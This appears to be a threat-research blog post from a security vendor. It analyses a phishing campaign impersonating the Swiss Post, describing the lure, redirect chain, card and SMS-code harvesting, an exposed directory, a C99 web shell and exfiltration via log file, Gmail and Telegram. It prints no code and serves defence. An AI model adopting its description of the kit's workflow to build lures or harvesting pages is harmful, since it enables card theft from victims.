•
4 min read
About the scam
On April 26th, a member of our threat research team was on his way to the RSA Conference when he received an email notification from (supposedly) the Swiss Post. The message was sent through a hijacked email service account, passing SPF checks. The email itself, while not perfect, could still appear convincing at first glance. For example, it included a logical error where the deadline to pay a fee was later than the stated delivery date, and the fee itself was suspiciously low. But these small inconsistencies are often overlooked by hurried users.
Screenshot of the phishing lure received on 26.4.2025, impersonating the Swiss Post parcel service (logo removed by author)
The links in the phishing email used a redirector hosted at https://email.notify.thinkific.com, which then forwarded users to a compromised website hosting the phishing content. After a series of local redirects, the final landing page prompted users to enter their credit card details to pay the alleged delivery fee. In some cases, the phishing kit was even configured to request the victim’s 2FA SMS code, simulating a real-time interaction.
Screenshot of the phishing site, accessed on 26.4.2025
Sloppy execution lets us see behind the curtain
So far, this is all standard—unfortunately, we see phishing kits like this every day. However, this one had a notable misstep: the attackers left the web directory listing exposed. These kinds of operational security (OpSec) failures are still surprisingly common and give researchers valuable insight into how such campaigns are run.
By accessing the open directory, we were able to view not just the phishing kit and its source code, but also log files with the recorded interaction of the victims. This transparency allowed us to reconstruct the attacker’s timeline. In this specific case, the phishing email was sent within 24 hours of the kit being deployed to the server. We have seen some groups sending the email in less then one hour after the first compromise.
Interestingly, the language and structure of the phishing page suggest it wasn’t created using generative AI. The HTML and PHP script still had room for optimization and lacked the characteristic comments or style we often see in AI-generated content.
In short, while the phishing lure was typical in many ways, the sloppy execution provided a look behind the scenes—reminding us that even cybercriminals make mistakes.
Screenshot of the web directory listing accidentally exposed by the scammers, accessed on 26.4.2025
Furthermore, the attackers had deployed C99, a well-known web shell that has been around for over 15 years. This tool allows attackers to maintain control over a compromised web server, enabling them to upload additional files or modify existing content as needed.
The phishing site itself was built using simple HTML and PHP files, likely scraped or cloned from legitimate websites to mimic a real parcel service. Victim data was exfiltrated through multiple channels: it was logged locally to a file, emailed to a Gmail address, and posted to a private Telegram channel. This kind of multi-channel exfiltration increases the attacker’s chances of capturing data even if one method fails—yet ironically, it also exposes the data to anyone who stumbles upon the open directory.
Already hundreds of credit cards stolen
It's reasonable to assume that the campaign had just started when we initiated our investigation. Nevertheless, we already discovered hundreds of customer data records within these log files. Naturally, not all log entries can be deemed reliable. Some might be test submissions from cautious users—or even from the attackers themselves during the setup phase. However, the entries we examined (and reported) seemed credible and aligned with actual victim behavior.
In a similar case in Germany dubbed Dracula, researchers investigated a phishing network operating over a seven-month period from 2023 to 2024. Log data revealed that approximately 13 million users clicked on the malicious link, and at least 884,000 submitted what appeared to be valid credit card information. That translates to a troubling 7% success rate for the cybercriminals.
A snapshot of the log file containing phished credit card details
Unlike other phishing kits such as Red Country, which often include sophisticated filtering to block known security researchers and crawlers by IP address or user agent, this kit applied no such restrictions.
We promptly reported all indicators of compromise (IoCs) to the relevant authorities, and the malicious content has since been taken down. Customers of xorlab were protected from this phishing attempt right from the start, thanks to our proactive detection capabilities.
Conclusion
This incident highlights both the persistence and the sloppiness of modern phishing operations. While attackers continue to refine their social engineering tactics, their infrastructure often contains glaring weaknesses—like open directories and unfiltered access—that defenders can leverage for investigation and takedown. On the other hand, they are still successful in compromising user data, even with these simple methods.
It also underscores the importance of layered defenses: robust email filtering, behavioral analysis, and proactive threat intelligence all play a role in stopping threats before they reach end users. At xorlab, we continue to monitor, analyze, and disrupt phishing campaigns like this one—keeping our customers a step ahead of attackers.
Stay vigilant, and remember: even a simple-looking email can lead to a deeper, more revealing story behind the scenes.